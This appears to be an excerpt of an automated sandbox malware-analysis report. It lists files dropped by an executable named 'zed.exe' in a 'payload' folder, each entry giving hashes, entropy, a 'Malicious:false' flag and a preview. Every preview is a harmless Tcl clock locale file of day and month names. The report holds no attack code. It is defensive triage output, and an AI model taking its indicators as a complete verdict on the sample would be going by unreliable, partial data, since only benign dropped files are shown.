                                                                                                                                                                                                                                            SSDEEP:24:4aR833cXh48Vc7VczfVczPmzNVcYVcR0prdSmS68FezUVcYVcR0prdSmS68FeoV:43K4S+0prjS68Yh0prjS68nV
                                                                                                                                                                                                                                            MD5:07F99E0A05083B10F80A4D6867163B23
                                                                                                                                                                                                                                            SHA1:B6036C7DA8043E3401583D03831E7A4BF755D93D
                                                                                                                                                                                                                                            SHA-256:AE873BF5484EACBBE179913D43451BE53378FA701B5D81594D052266B8A09AF0
                                                                                                                                                                                                                                            SHA-512:3A032C81B8FBFEE6EB66C1538CBD16329A1B393E4684B4E9B3FBCDD6344CE8AD34FA699F76EF953B3EB597D8E253345F54C2E92E7A43611C721038BCC2471EA2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mr DAYS_OF_WEEK_FULL [list \.. "\u0930\u0935\u093f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset mr MONTHS_ABBREV [list \.. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\.. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u090f\u092a\u094d\u0930\u093f\u0932"\.. "\u092e\u0947"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u0948"\.. "\u0913\u0917\u0938\u094d\u091f"\.. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\.. "\u0913\u0915\u094d\u091f\u0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.89440333975705
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoGNv+IZoGU3v6ry/5oGNo+3v+6f6HyFvn:4EnLB383Zvlw3v6ry/ZF3vmSVn
                                                                                                                                                                                                                                            MD5:67368E8A5715860BABD44E54A168192F
                                                                                                                                                                                                                                            SHA1:7790D4B4B28FE5E38AB11CD037FFB826A8EB77FD
                                                                                                                                                                                                                                            SHA-256:B7B1D379355A1D278E13EF557A887A662E84FB6A9B62B8E19A27927926270EF9
                                                                                                                                                                                                                                            SHA-512:E95C90CFFA7CC4E61026FC328A4AA0BEE6A54A0061BA0B9459F9F0F4B008DD36F81BC9B8D8B964FA051FCEAB7FECE6D107CD456B3FD01A83B4900ECC3A0BCFA4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mr_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset mr_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset mr_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):957
                                                                                                                                                                                                                                            Entropy (8bit):4.018924167342869
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383Zm/aufodZmt+JHEA7UVRosmAL/7Idzr43xRRosuL1PJHWZ6tHhHjv:4aR83ZsauSHJkA7umE/72UD21PJWZ0hT
                                                                                                                                                                                                                                            MD5:7E6A943B7D82404F61BDBD95682073CD
                                                                                                                                                                                                                                            SHA1:B96DBB1738F293D2842FDCEDF2DEF13004F77A8D
                                                                                                                                                                                                                                            SHA-256:970B2F3ECC04980FCC2F9531CA6CE2BF36BC12942CB614BF70313B4CB0508985
                                                                                                                                                                                                                                            SHA-512:12F5A5F7A170EE79D1F4398E96FF2DE84472027C5B5003DE7E86F46713E3F0997439E2EBA03FFB7DB611F0CE0E06EB149F5BD08ED2AA0409DB8348867487FFFD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ms DAYS_OF_WEEK_ABBREV [list \.. "Aha"\.. "Isn"\.. "Sei"\.. "Rab"\.. "Kha"\.. "Jum"\.. "Sab"].. ::msgcat::mcset ms DAYS_OF_WEEK_FULL [list \.. "Ahad"\.. "Isnin"\.. "Selasa"\.. "Rahu"\.. "Khamis"\.. "Jumaat"\.. "Sabtu"].. ::msgcat::mcset ms MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mac"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ogos"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dis"\.. ""].. ::msgcat::mcset ms MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Mac"\.. "April"\.. "Mei"\.. "Jun"\.. "Julai"\.. "Ogos"\.. "September"\.. "Oktober"\.. "November"\.. "Disember"\.. ""]..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):265
                                                                                                                                                                                                                                            Entropy (8bit):4.818053174805798
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoChFfluoChF+3v6xyFjoCh++3vflm68vn:4EnLB383xPflwe3v6gZl3vflm6+n
                                                                                                                                                                                                                                            MD5:A02F11BE0DF920E63E7A3ACCE746E32D
                                                                                                                                                                                                                                            SHA1:4A8B1EF1A6F8A5FD022042D6E009A01E4B0FEBD3
                                                                                                                                                                                                                                            SHA-256:F5B859D8DD2A2B5F756E39B0DFEB26B95878D2F54BA3CE46C56F0F26CF2B554B
                                                                                                                                                                                                                                            SHA-512:5F9AF8C89F491CB4C158ED73EA4CF32E6A83CF44A94DA6FE1A962C58199BF2348530F3DEFA0C6F433BA3ADEF81AE9B3884F30CD7A841B159D52F9F21008B4F92
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ms_MY DATE_FORMAT "%A %d %b %Y".. ::msgcat::mcset ms_MY TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset ms_MY DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):717
                                                                                                                                                                                                                                            Entropy (8bit):4.55153350337982
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383VYmxWHWog4QUbxMmAMMiGZu+3v6ay/GK3vZsSVn:4aR83VYsxonQ2MmVVGRvjCGsvGSV
                                                                                                                                                                                                                                            MD5:D8BBEC2F8935054E6081BB5E4AE8F7E3
                                                                                                                                                                                                                                            SHA1:33FE6D51A284B8760BC6F442329B10374F506BDA
                                                                                                                                                                                                                                            SHA-256:7DBC4E82D82FDE8CDF522FA10E082289D46B0C1A4A7D7A5FA83FF116677F052B
                                                                                                                                                                                                                                            SHA-512:BF39C75DD6B3625897D7D44AC253AF5656CA21D0B394F78611584E2606CBC419C4A02353542D23393BEBCCF0CB4D861CDECD61AD89339F78C0260E966B495777
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mt DAYS_OF_WEEK_ABBREV [list \.. "\u0126ad"\.. "Tne"\.. "Tli"\.. "Erb"\.. "\u0126am"\.. "\u0120im"].. ::msgcat::mcset mt MONTHS_ABBREV [list \.. "Jan"\.. "Fra"\.. "Mar"\.. "Apr"\.. "Mej"\.. "\u0120un"\.. "Lul"\.. "Awi"\.. "Set"\.. "Ott"\.. "Nov"].. ::msgcat::mcset mt BCE "QK".. ::msgcat::mcset mt CE "".. ::msgcat::mcset mt DATE_FORMAT "%A, %e ta %B, %Y".. ::msgcat::mcset mt TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset mt DATE_TIME_FORMAT "%A, %e ta %B, %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1209
                                                                                                                                                                                                                                            Entropy (8bit):4.313626715960843
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83B0tSYuZrIsmYmPAxyIQ4HU92W16EL3Tvav31:43qhuZrIPAt04yTcF
                                                                                                                                                                                                                                            MD5:42D02C3CAF28BE4994F27CEF5A183AB7
                                                                                                                                                                                                                                            SHA1:DC411E8AC12C3D588AB2F3A3C95A75D8689AD402
                                                                                                                                                                                                                                            SHA-256:534C5DACEF12F818FAF4ED806997A559F95D591F1B6236B0C30B07A107DD13F3
                                                                                                                                                                                                                                            SHA-512:0BE27572106324FE2B6CDFF4513500DE7582AD1ABEF451FFC62B2050D3875A149DDDB66451E1B3F5BA9216268E9998D2A1C1E8343BBB9EF97947DA054B82818E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nb DAYS_OF_WEEK_ABBREV [list \.. "s\u00f8"\.. "ma"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f8"].. ::msgcat::mcset nb DAYS_OF_WEEK_FULL [list \.. "s\u00f8ndag"\.. "mandag"\.. "tirsdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f8rdag"].. ::msgcat::mcset nb MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nb MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nb BC
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1129
                                                                                                                                                                                                                                            Entropy (8bit):4.235969198645435
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR837Ed+RxRMZZsmUmnZAEEHM92WFU5vtrvs:43AAHRMZZPnZALsCtt7s
                                                                                                                                                                                                                                            MD5:B9B949794203D204628D4DBEA29587AE
                                                                                                                                                                                                                                            SHA1:1642D8040144469B5C359E80693E68036F87B849
                                                                                                                                                                                                                                            SHA-256:9E2FE3851CF13EC79A9B10A09B01CEB0A26044AE0DC90A4E00BE57745E854C79
                                                                                                                                                                                                                                            SHA-512:0CCCCF6D61423CEE0389C3BA1A8E94F2B092C53465D1937F5595AF91E46DD38B318D6C7EE3D88B89F32BFB952C0D55E0E67B46D7DF306ECA6690E283ADEB2CB9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl DAYS_OF_WEEK_ABBREV [list \.. "zo"\.. "ma"\.. "di"\.. "wo"\.. "do"\.. "vr"\.. "za"].. ::msgcat::mcset nl DAYS_OF_WEEK_FULL [list \.. "zondag"\.. "maandag"\.. "dinsdag"\.. "woensdag"\.. "donderdag"\.. "vrijdag"\.. "zaterdag"].. ::msgcat::mcset nl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mrt"\.. "apr"\.. "mei"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset nl MONTHS_FULL [list \.. "januari"\.. "februari"\.. "maart"\.. "april"\.. "mei"\.. "juni"\.. "juli"\.. "augustus"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset nl DATE_FORM
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.865165930946383
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo4gPPdjog9X3vLjog9X3v6mjo49+3vnFDoAkvn:4EnLB3835gHdPF3vjF3v64I3v9dmn
                                                                                                                                                                                                                                            MD5:3261F397ED0291368FF1881E7BA08ECE
                                                                                                                                                                                                                                            SHA1:7147ABB62034EB152B1FED9246A533535F07372C
                                                                                                                                                                                                                                            SHA-256:77A69DD60D171B321512B14794E75A66FF753410C007997B310790D86E09B057
                                                                                                                                                                                                                                            SHA-512:C1526F454FA594DAD056B056F76F01D8B2AB713D04EB2A3643416B8E741B248CC94E000BAEE5B0F60436B88B1216FB1DE7F7C3FA456D4A4FBDE24F97C3B739B8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl_BE DATE_FORMAT "%d-%m-%y".. ::msgcat::mcset nl_BE TIME_FORMAT "%T".. ::msgcat::mcset nl_BE TIME_FORMAT_12 "%T".. ::msgcat::mcset nl_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1200
                                                                                                                                                                                                                                            Entropy (8bit):4.282788574144479
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83tCtrJwuQrIsmYmLAxyIQ4HU92W1W4/3Hv+v31:434suQrILAt0EafIF
                                                                                                                                                                                                                                            MD5:985E97517C2BF37719A618F575DF392C
                                                                                                                                                                                                                                            SHA1:65BC07FC3A955300ED09B7485F90AEC18CBAD43F
                                                                                                                                                                                                                                            SHA-256:06FA2D6D8C59D0B8EAC2EDE5AB0DDB8B6E095D1A023B1966FCE3B65916FA14FB
                                                                                                                                                                                                                                            SHA-512:75BC14DBAD147A98D32D2AF0BE0BE50F115BB9C3BBE283B53977B9F264A055734B30F6B1C4EEE9686F1874D178C535111731C92D495B7D370FB17213B65C9A40
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nn DAYS_OF_WEEK_ABBREV [list \.. "su"\.. "m\u00e5"\.. "ty"\.. "on"\.. "to"\.. "fr"\.. "lau"].. ::msgcat::mcset nn DAYS_OF_WEEK_FULL [list \.. "sundag"\.. "m\u00e5ndag"\.. "tysdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "laurdag"].. ::msgcat::mcset nn MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nn MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nn BCE "f.Kr."
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1263
                                                                                                                                                                                                                                            Entropy (8bit):4.459506202908786
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83lUj0ORGgIzdW6RDYKG7FwRc0ypvOvX:43+HMg2W6RDYnFwRc0ydYX
                                                                                                                                                                                                                                            MD5:79AB7C13AA3833A1DAEADDB1144CCE55
                                                                                                                                                                                                                                            SHA1:C01ABC2F16549CAEC6B081448B2CBA88A680E250
                                                                                                                                                                                                                                            SHA-256:61462C325DB0065352D8155307F949869862A86CAC67AD7BB6703F57A7FA2FF3
                                                                                                                                                                                                                                            SHA-512:79EB696164FDDD9B121558C2780E54E295FF2DC4D8E87A0DE507B4F2925612721A98FF5010199CB68CF894ACA7A07884E9E02F3DC1E078D241431E3DC884C0A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pl DAYS_OF_WEEK_ABBREV [list \.. "N"\.. "Pn"\.. "Wt"\.. "\u015ar"\.. "Cz"\.. "Pt"\.. "So"].. ::msgcat::mcset pl DAYS_OF_WEEK_FULL [list \.. "niedziela"\.. "poniedzia\u0142ek"\.. "wtorek"\.. "\u015broda"\.. "czwartek"\.. "pi\u0105tek"\.. "sobota"].. ::msgcat::mcset pl MONTHS_ABBREV [list \.. "sty"\.. "lut"\.. "mar"\.. "kwi"\.. "maj"\.. "cze"\.. "lip"\.. "sie"\.. "wrz"\.. "pa\u017a"\.. "lis"\.. "gru"\.. ""].. ::msgcat::mcset pl MONTHS_FULL [list \.. "stycze\u0144"\.. "luty"\.. "marzec"\.. "kwiecie\u0144"\.. "maj"\.. "czerwiec"\.. "lipiec"\.. "sierpie\u0144"\.. "wrzesie\u0144"\.. "pa\u017adziernik"\.. "listopad"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1177
                                                                                                                                                                                                                                            Entropy (8bit):4.394980756969744
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83CYkjBc1yHYJt//0/I31YMY47flV7YaqgCyt9Fo8g6Gtvt76svi:43C5LHcNnxJ9Ltg6Gpt76Ki
                                                                                                                                                                                                                                            MD5:8F53B3571DD29E12BD33349CFA32F28F
                                                                                                                                                                                                                                            SHA1:C125E059B8BFE5FECD482D1A1DA50B8678872BF6
                                                                                                                                                                                                                                            SHA-256:6F6EEEDDCF232BDCB952592A144810CED44A1CBB4BCC2C062D5F98D441505380
                                                                                                                                                                                                                                            SHA-512:5CD7E7097B720E5399795126A71348816CBA697FD8F14160779E982ADAB00D5994978E2F9445785B0DE62F6F14232278AD1A65BC53730CA58D676B057F0BC406
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt DAYS_OF_WEEK_ABBREV [list \.. "Dom"\.. "Seg"\.. "Ter"\.. "Qua"\.. "Qui"\.. "Sex"\.. "S\u00e1b"].. ::msgcat::mcset pt DAYS_OF_WEEK_FULL [list \.. "Domingo"\.. "Segunda-feira"\.. "Ter\u00e7a-feira"\.. "Quarta-feira"\.. "Quinta-feira"\.. "Sexta-feira"\.. "S\u00e1bado"].. ::msgcat::mcset pt MONTHS_ABBREV [list \.. "Jan"\.. "Fev"\.. "Mar"\.. "Abr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Set"\.. "Out"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset pt MONTHS_FULL [list \.. "Janeiro"\.. "Fevereiro"\.. "Mar\u00e7o"\.. "Abril"\.. "Maio"\.. "Junho"\.. "Julho"\.. "Agosto"\.. "Setembro"\.. "Outubro"\.. "Novembro"\.. "Dezembro"
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.8608779725401785
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xofm6GPWWjofAW3vLjofAW3v6mjofm6T+3vnFDoAkvn:4EnLB383+NGdg93vk93v6fNK3v9dmn
                                                                                                                                                                                                                                            MD5:A2626EA95C2480FEA68906AE6A1F6993
                                                                                                                                                                                                                                            SHA1:A0592902337C00FC2E70B1DFB3A42453A86535BB
                                                                                                                                                                                                                                            SHA-256:320BE7D5B730091E6FA35F196314737261C8E154577DCF6AC8C2057D44394AD7
                                                                                                                                                                                                                                            SHA-512:9801A87D024565676D4F3EAF0702C213E59FC2B6719D8BE95C19C9ED53FC43487F65F5408378B401A2B4C2BD4E2E391C2D848CA87739A6082AB7766EC6B9EFE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt_BR DATE_FORMAT "%d-%m-%Y".. ::msgcat::mcset pt_BR TIME_FORMAT "%T".. ::msgcat::mcset pt_BR TIME_FORMAT_12 "%T".. ::msgcat::mcset pt_BR DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1224
                                                                                                                                                                                                                                            Entropy (8bit):4.350784108088039
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83coPUMSeZmkTMm41icpK+7ZVoImEcVUCWdvHvWIn:43lPHFmkm1iMVoxEc+CWZPWIn
                                                                                                                                                                                                                                            MD5:F6575EC17966320106FF7ABDFB3186E2
                                                                                                                                                                                                                                            SHA1:68C6B72D664FDA27450FCE8B5734AB627CE825D7
                                                                                                                                                                                                                                            SHA-256:25ED6AC7A353E23B954B98611AE3B7E56BDCF2B0CB0DB358253CFB8BEBBB831C
                                                                                                                                                                                                                                            SHA-512:E564543231922A17C898419545BFA65E5E31FE9F005FDD201B735CFDE08E96FB3B98349C2A7959E29CA8F7E6934B0C4C6DE6B5E67209D0DD9A7746DFEBF037B3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ro DAYS_OF_WEEK_ABBREV [list \.. "D"\.. "L"\.. "Ma"\.. "Mi"\.. "J"\.. "V"\.. "S"].. ::msgcat::mcset ro DAYS_OF_WEEK_FULL [list \.. "duminic\u0103"\.. "luni"\.. "mar\u0163i"\.. "miercuri"\.. "joi"\.. "vineri"\.. "s\u00eemb\u0103t\u0103"].. ::msgcat::mcset ro MONTHS_ABBREV [list \.. "Ian"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mai"\.. "Iun"\.. "Iul"\.. "Aug"\.. "Sep"\.. "Oct"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset ro MONTHS_FULL [list \.. "ianuarie"\.. "februarie"\.. "martie"\.. "aprilie"\.. "mai"\.. "iunie"\.. "iulie"\.. "august"\.. "septembrie"\.. "octombrie"\.. "noiembrie"\.. "decembrie"\.. ""].. ::msgcat:
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2091
                                                                                                                                                                                                                                            Entropy (8bit):4.2886524607041006
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43D+pQ7keidQfRQPgQHB81Z/sFIAZSQWQXQrQxJQjQRnQBFQiWftkWt:26pgkeoSnpjA4tMYiJcCMFmVRt
                                                                                                                                                                                                                                            MD5:9F1C8DD58550558977821FD500E7C0E0
                                                                                                                                                                                                                                            SHA1:EFDD809BC2872A5BE0E353D31BE6D7D72E4B829C
                                                                                                                                                                                                                                            SHA-256:BB35BB6F07BAEF72C329EC3E95D6527A2736070EE2FFE5DE227E1FF0332390F8
                                                                                                                                                                                                                                            SHA-512:AA3C5C40AE9D342F8287958355C3321CF60566AD3E84E3D18D782FC022A998DA275506A61010A65D2E7D7578F2919C47C63AB0BA63A38800AA48D4B88ACE54D3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru DAYS_OF_WEEK_ABBREV [list \.. "\u0412\u0441"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset ru DAYS_OF_WEEK_FULL [list \.. "\u0432\u043e\u0441\u043a\u0440\u0435\u0441\u0435\u043d\u044c\u0435"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440\u0433"\.. "\u043f\u044f\u0442\u043d\u0438\u0446\u0430"\.. "\u0441\u0443\u0431\u0431\u043e\u0442\u0430"].. ::msgcat::mcset ru MONTHS_ABBREV [list \.. "\u044f\u043d\u0432"\.. "\u0444\u0435\u0432"\.. "\u043c\u0430\u0440"\.. "\u0430\u043f\u0440"\.. "\u043c\u0430\u0439"\.. "\u0438\u044e\u
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):248
                                                                                                                                                                                                                                            Entropy (8bit):4.9420431225061
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoVAgWIZoVY9X3vtfNrsoVA9+3vW6Q9vn:4EnLB383SFWIyaX3vtNl/3vWHNn
                                                                                                                                                                                                                                            MD5:DC98D88964650E302BE97FDB3B33326E
                                                                                                                                                                                                                                            SHA1:1DDDCC4265D7B980B867FEE674BEF2FD87D823F7
                                                                                                                                                                                                                                            SHA-256:13E4E79A0ED82034BADE0CFF8DEF5DE1222F6968108AD710662BDB7DAF36D7E1
                                                                                                                                                                                                                                            SHA-512:F3B9D528C529DD520FEDA3C20ED354E521C5B3C29F3317E15B7939CE06A3D67554D34DD6E54FE038585E46C560C604A1FD7E7F84914086B5994D52CE2C9E99CE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru_UA DATE_FORMAT "%d.%m.%Y".. ::msgcat::mcset ru_UA TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset ru_UA DATE_TIME_FORMAT "%d.%m.%Y %k:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1212
                                                                                                                                                                                                                                            Entropy (8bit):4.359036493565628
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83/YIXo4YY0dD6kMm7fX2NaSIvZdHZgHZ/IxvaGWxvtl9svWTN:43rLTR44/yWltOWB
                                                                                                                                                                                                                                            MD5:E297221FA73BD78577B398BC7D061D21
                                                                                                                                                                                                                                            SHA1:F2A6B456272F913A9E97C495CEE73AC774C90FA1
                                                                                                                                                                                                                                            SHA-256:E65D6E5E837DF0A2DF0DB77BCE45334BBC27EFFF9023C37119E75D49932D9D6C
                                                                                                                                                                                                                                            SHA-512:AB9DDAE7CB21193C7753041F0B88CF2D40987E7E604B47816219458D217F084AA4EBF36719E22AAB3FD71A271D9F956ADC353182991903D7ADE8C8F00F6B2F9B
                                                                                                                                                                                                                                            Malicious:false
